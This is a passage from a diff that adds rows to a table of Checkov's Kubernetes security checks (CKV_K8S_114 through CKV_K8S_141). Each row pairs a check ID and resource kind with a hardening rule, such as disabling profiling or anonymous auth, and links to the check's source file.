+| 3538 | CKV_K8S_114              | resource                         | Job                                                                                              | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py)                                                                                          |
+| 3539 | CKV_K8S_114              | resource                         | Pod                                                                                              | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py)                                                                                          |
+| 3540 | CKV_K8S_114              | resource                         | PodTemplate                                                                                      | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py)                                                                                          |
+| 3541 | CKV_K8S_114              | resource                         | ReplicaSet                                                                                       | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py)                                                                                          |
+| 3542 | CKV_K8S_114              | resource                         | ReplicationController                                                                            | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py)                                                                                          |
+| 3543 | CKV_K8S_114              | resource                         | StatefulSet                                                                                      | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py)                                                                                          |
+| 3544 | CKV_K8S_115              | resource                         | CronJob                                                                                          | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py)                                                                                      |
+| 3545 | CKV_K8S_115              | resource                         | DaemonSet                                                                                        | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py)                                                                                      |
+| 3546 | CKV_K8S_115              | resource                         | Deployment                                                                                       | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py)                                                                                      |
+| 3547 | CKV_K8S_115              | resource                         | DeploymentConfig                                                                                 | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py)                                                                                      |
+| 3548 | CKV_K8S_115              | resource                         | Job                                                                                              | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py)                                                                                      |
+| 3549 | CKV_K8S_115              | resource                         | Pod                                                                                              | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py)                                                                                      |
+| 3550 | CKV_K8S_115              | resource                         | PodTemplate                                                                                      | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py)                                                                                      |
+| 3551 | CKV_K8S_115              | resource                         | ReplicaSet                                                                                       | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py)                                                                                      |
+| 3552 | CKV_K8S_115              | resource                         | ReplicationController                                                                            | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py)                                                                                      |
+| 3553 | CKV_K8S_115              | resource                         | StatefulSet                                                                                      | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py)                                                                                      |
+| 3554 | CKV_K8S_116              | resource                         | CronJob                                                                                          | Ensure that the --cert-file and --key-file arguments are set as appropriate                                                                                                                              | Kubernetes              | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py)                                                                                                  |
+| 3555 | CKV_K8S_116              | resource                         | DaemonSet                                                                                        | Ensure that the --cert-file and --key-file arguments are set as appropriate                                                                                                                              | Kubernetes              | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py)                                                                                                  |
+| 3556 | CKV_K8S_116              | resource                         | Deployment                                                                                       | Ensure that the --cert-file and --key-file arguments are set as appropriate                                                                                                                              | Kubernetes              | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py)                                                                                                  |
+| 3557 | CKV_K8S_116              | resource                         | DeploymentConfig                                                                                 | Ensure that the --cert-file and --key-file arguments are set as appropriate                                                                                                                              | Kubernetes              | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py)                                                                                                  |
+| 3558 | CKV_K8S_116              | resource                         | Job                                                                                              | Ensure that the --cert-file and --key-file arguments are set as appropriate                                                                                                                              | Kubernetes              | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py)                                                                                                  |
+| 3559 | CKV_K8S_116              | resource                         | Pod                                                                                              | Ensure that the --cert-file and --key-file arguments are set as appropriate                                                                                                                              | Kubernetes              | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py)                                                                                                  |
+| 3560 | CKV_K8S_116              | resource                         | PodTemplate                                                                                      | Ensure that the --cert-file and --key-file arguments are set as appropriate                                                                                                                              | Kubernetes              | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py)                                                                                                  |
+| 3561 | CKV_K8S_116              | resource                         | ReplicaSet                                                                                       | Ensure that the --cert-file and --key-file arguments are set as appropriate                                                                                                                              | Kubernetes              | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py)                                                                                                  |
+| 3562 | CKV_K8S_116              | resource                         | ReplicationController                                                                            | Ensure that the --cert-file and --key-file arguments are set as appropriate                                                                                                                              | Kubernetes              | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py)                                                                                                  |
+| 3563 | CKV_K8S_116              | resource                         | StatefulSet                                                                                      | Ensure that the --cert-file and --key-file arguments are set as appropriate                                                                                                                              | Kubernetes              | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py)                                                                                                  |
+| 3564 | CKV_K8S_117              | resource                         | CronJob                                                                                          | Ensure that the --client-cert-auth argument is set to true                                                                                                                                               | Kubernetes              | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py)                                                                                          |
+| 3565 | CKV_K8S_117              | resource                         | DaemonSet                                                                                        | Ensure that the --client-cert-auth argument is set to true                                                                                                                                               | Kubernetes              | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py)                                                                                          |
+| 3566 | CKV_K8S_117              | resource                         | Deployment                                                                                       | Ensure that the --client-cert-auth argument is set to true                                                                                                                                               | Kubernetes              | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py)                                                                                          |
+| 3567 | CKV_K8S_117              | resource                         | DeploymentConfig                                                                                 | Ensure that the --client-cert-auth argument is set to true                                                                                                                                               | Kubernetes              | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py)                                                                                          |
+| 3568 | CKV_K8S_117              | resource                         | Job                                                                                              | Ensure that the --client-cert-auth argument is set to true                                                                                                                                               | Kubernetes              | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py)                                                                                          |
+| 3569 | CKV_K8S_117              | resource                         | Pod                                                                                              | Ensure that the --client-cert-auth argument is set to true                                                                                                                                               | Kubernetes              | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py)                                                                                          |
+| 3570 | CKV_K8S_117              | resource                         | PodTemplate                                                                                      | Ensure that the --client-cert-auth argument is set to true                                                                                                                                               | Kubernetes              | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py)                                                                                          |
+| 3571 | CKV_K8S_117              | resource                         | ReplicaSet                                                                                       | Ensure that the --client-cert-auth argument is set to true                                                                                                                                               | Kubernetes              | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py)                                                                                          |
+| 3572 | CKV_K8S_117              | resource                         | ReplicationController                                                                            | Ensure that the --client-cert-auth argument is set to true                                                                                                                                               | Kubernetes              | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py)                                                                                          |
+| 3573 | CKV_K8S_117              | resource                         | StatefulSet                                                                                      | Ensure that the --client-cert-auth argument is set to true                                                                                                                                               | Kubernetes              | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py)                                                                                          |
+| 3574 | CKV_K8S_118              | resource                         | CronJob                                                                                          | Ensure that the --auto-tls argument is not set to true                                                                                                                                                   | Kubernetes              | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py)                                                                                                        |
+| 3575 | CKV_K8S_118              | resource                         | DaemonSet                                                                                        | Ensure that the --auto-tls argument is not set to true                                                                                                                                                   | Kubernetes              | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py)                                                                                                        |
+| 3576 | CKV_K8S_118              | resource                         | Deployment                                                                                       | Ensure that the --auto-tls argument is not set to true                                                                                                                                                   | Kubernetes              | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py)                                                                                                        |
+| 3577 | CKV_K8S_118              | resource                         | DeploymentConfig                                                                                 | Ensure that the --auto-tls argument is not set to true                                                                                                                                                   | Kubernetes              | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py)                                                                                                        |
+| 3578 | CKV_K8S_118              | resource                         | Job                                                                                              | Ensure that the --auto-tls argument is not set to true                                                                                                                                                   | Kubernetes              | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py)                                                                                                        |
+| 3579 | CKV_K8S_118              | resource                         | Pod                                                                                              | Ensure that the --auto-tls argument is not set to true                                                                                                                                                   | Kubernetes              | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py)                                                                                                        |
+| 3580 | CKV_K8S_118              | resource                         | PodTemplate                                                                                      | Ensure that the --auto-tls argument is not set to true                                                                                                                                                   | Kubernetes              | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py)                                                                                                        |
+| 3581 | CKV_K8S_118              | resource                         | ReplicaSet                                                                                       | Ensure that the --auto-tls argument is not set to true                                                                                                                                                   | Kubernetes              | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py)                                                                                                        |
+| 3582 | CKV_K8S_118              | resource                         | ReplicationController                                                                            | Ensure that the --auto-tls argument is not set to true                                                                                                                                                   | Kubernetes              | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py)                                                                                                        |
+| 3583 | CKV_K8S_118              | resource                         | StatefulSet                                                                                      | Ensure that the --auto-tls argument is not set to true                                                                                                                                                   | Kubernetes              | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py)                                                                                                        |
+| 3584 | CKV_K8S_119              | resource                         | CronJob                                                                                          | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate                                                                                                                    | Kubernetes              | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py)                                                                                                    |
+| 3585 | CKV_K8S_119              | resource                         | DaemonSet                                                                                        | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate                                                                                                                    | Kubernetes              | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py)                                                                                                    |
+| 3586 | CKV_K8S_119              | resource                         | Deployment                                                                                       | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate                                                                                                                    | Kubernetes              | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py)                                                                                                    |
+| 3587 | CKV_K8S_119              | resource                         | DeploymentConfig                                                                                 | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate                                                                                                                    | Kubernetes              | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py)                                                                                                    |
+| 3588 | CKV_K8S_119              | resource                         | Job                                                                                              | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate                                                                                                                    | Kubernetes              | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py)                                                                                                    |
+| 3589 | CKV_K8S_119              | resource                         | Pod                                                                                              | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate                                                                                                                    | Kubernetes              | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py)                                                                                                    |
+| 3590 | CKV_K8S_119              | resource                         | PodTemplate                                                                                      | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate                                                                                                                    | Kubernetes              | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py)                                                                                                    |
+| 3591 | CKV_K8S_119              | resource                         | ReplicaSet                                                                                       | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate                                                                                                                    | Kubernetes              | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py)                                                                                                    |
+| 3592 | CKV_K8S_119              | resource                         | ReplicationController                                                                            | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate                                                                                                                    | Kubernetes              | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py)                                                                                                    |
+| 3593 | CKV_K8S_119              | resource                         | StatefulSet                                                                                      | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate                                                                                                                    | Kubernetes              | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py)                                                                                                    |
+| 3594 | CKV_K8S_121              | resource                         | Pod                                                                                              | Ensure that the --peer-client-cert-auth argument is set to true                                                                                                                                          | Kubernetes              | [PeerClientCertAuthTrue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PeerClientCertAuthTrue.py)                                                                                  |
+| 3595 | CKV_K8S_138              | resource                         | CronJob                                                                                          | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py)                                                                                      |
+| 3596 | CKV_K8S_138              | resource                         | DaemonSet                                                                                        | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py)                                                                                      |
+| 3597 | CKV_K8S_138              | resource                         | Deployment                                                                                       | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py)                                                                                      |
+| 3598 | CKV_K8S_138              | resource                         | DeploymentConfig                                                                                 | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py)                                                                                      |
+| 3599 | CKV_K8S_138              | resource                         | Job                                                                                              | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py)                                                                                      |
+| 3600 | CKV_K8S_138              | resource                         | Pod                                                                                              | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py)                                                                                      |
+| 3601 | CKV_K8S_138              | resource                         | PodTemplate                                                                                      | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py)                                                                                      |
+| 3602 | CKV_K8S_138              | resource                         | ReplicaSet                                                                                       | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py)                                                                                      |
+| 3603 | CKV_K8S_138              | resource                         | ReplicationController                                                                            | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py)                                                                                      |
+| 3604 | CKV_K8S_138              | resource                         | StatefulSet                                                                                      | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py)                                                                                      |
+| 3605 | CKV_K8S_139              | resource                         | CronJob                                                                                          | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py)                                                  |
+| 3606 | CKV_K8S_139              | resource                         | DaemonSet                                                                                        | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py)                                                  |
+| 3607 | CKV_K8S_139              | resource                         | Deployment                                                                                       | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py)                                                  |
+| 3608 | CKV_K8S_139              | resource                         | DeploymentConfig                                                                                 | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py)                                                  |
+| 3609 | CKV_K8S_139              | resource                         | Job                                                                                              | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py)                                                  |
+| 3610 | CKV_K8S_139              | resource                         | Pod                                                                                              | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py)                                                  |
+| 3611 | CKV_K8S_139              | resource                         | PodTemplate                                                                                      | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py)                                                  |
+| 3612 | CKV_K8S_139              | resource                         | ReplicaSet                                                                                       | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py)                                                  |
+| 3613 | CKV_K8S_139              | resource                         | ReplicationController                                                                            | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py)                                                  |
+| 3614 | CKV_K8S_139              | resource                         | StatefulSet                                                                                      | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py)                                                  |
+| 3615 | CKV_K8S_140              | resource                         | CronJob                                                                                          | Ensure that the --client-ca-file argument is set as appropriate                                                                                                                                          | Kubernetes              | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py)                                                                                                |
+| 3616 | CKV_K8S_140              | resource                         | DaemonSet                                                                                        | Ensure that the --client-ca-file argument is set as appropriate                                                                                                                                          | Kubernetes              | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py)                                                                                                |
+| 3617 | CKV_K8S_140              | resource                         | Deployment                                                                                       | Ensure that the --client-ca-file argument is set as appropriate                                                                                                                                          | Kubernetes              | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py)                                                                                                |
+| 3618 | CKV_K8S_140              | resource                         | DeploymentConfig                                                                                 | Ensure that the --client-ca-file argument is set as appropriate                                                                                                                                          | Kubernetes              | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py)                                                                                                |
+| 3619 | CKV_K8S_140              | resource                         | Job                                                                                              | Ensure that the --client-ca-file argument is set as appropriate                                                                                                                                          | Kubernetes              | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py)                                                                                                |
+| 3620 | CKV_K8S_140              | resource                         | Pod                                                                                              | Ensure that the --client-ca-file argument is set as appropriate                                                                                                                                          | Kubernetes              | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py)                                                                                                |
+| 3621 | CKV_K8S_140              | resource                         | PodTemplate                                                                                      | Ensure that the --client-ca-file argument is set as appropriate                                                                                                                                          | Kubernetes              | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py)                                                                                                |
+| 3622 | CKV_K8S_140              | resource                         | ReplicaSet                                                                                       | Ensure that the --client-ca-file argument is set as appropriate                                                                                                                                          | Kubernetes              | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py)                                                                                                |
+| 3623 | CKV_K8S_140              | resource                         | ReplicationController                                                                            | Ensure that the --client-ca-file argument is set as appropriate                                                                                                                                          | Kubernetes              | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py)                                                                                                |
+| 3624 | CKV_K8S_140              | resource                         | StatefulSet                                                                                      | Ensure that the --client-ca-file argument is set as appropriate                                                                                                                                          | Kubernetes              | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py)                                                                                                |
+| 3625 | CKV_K8S_141              | resource                         | CronJob                                                                                          | Ensure that the --read-only-port argument is set to 0                                                                                                                                                    | Kubernetes              | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py)                                                                                        |
+| 3626 | CKV_K8S_141              | resource                         | DaemonSet                                                                                        | Ensure that the --read-only-port argument is set to 0                                                                                                                                                    | Kubernetes              | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py)                                                                                        |
+| 3627 | CKV_K8S_141              | resource                         | Deployment                                                                                       | Ensure that the --read-only-port argument is set to 0                                                                                                                                                    | Kubernetes              | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py)                                                                                        |
+| 3628 | CKV_K8S_141              | resource                         | DeploymentConfig                                                                                 | Ensure that the --read-only-port argument is set to 0                                                                                                                                                    | Kubernetes              | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py)                                                                                        |
+| 3629 | CKV_K8S_141              | resource                         | Job                                                                                              | Ensure that the --read-only-port argument is set to 0                                                                                                                                                    | Kubernetes              | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py)                                                                                        |
+| 3630 | CKV_K8S_141              | resource                         | Pod                                                                                              | Ensure that the --read-only-port argument is set to 0                                                                                                                                                    | Kubernetes              | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py)                                                                                        |
+| 3631 | CKV_K8S_141              | resource                         | PodTemplate                                                                                      | Ensure that the --read-only-port argument is set to 0                                                                                                                                                    | Kubernetes              | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py)                                                                                        |
+| 3632 | CKV_K8S_141              | resource                         | ReplicaSet                                                                                       | Ensure that the --read-only-port argument is set to 0                                                                                                                                                    | Kubernetes              | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py)                                                                                        |
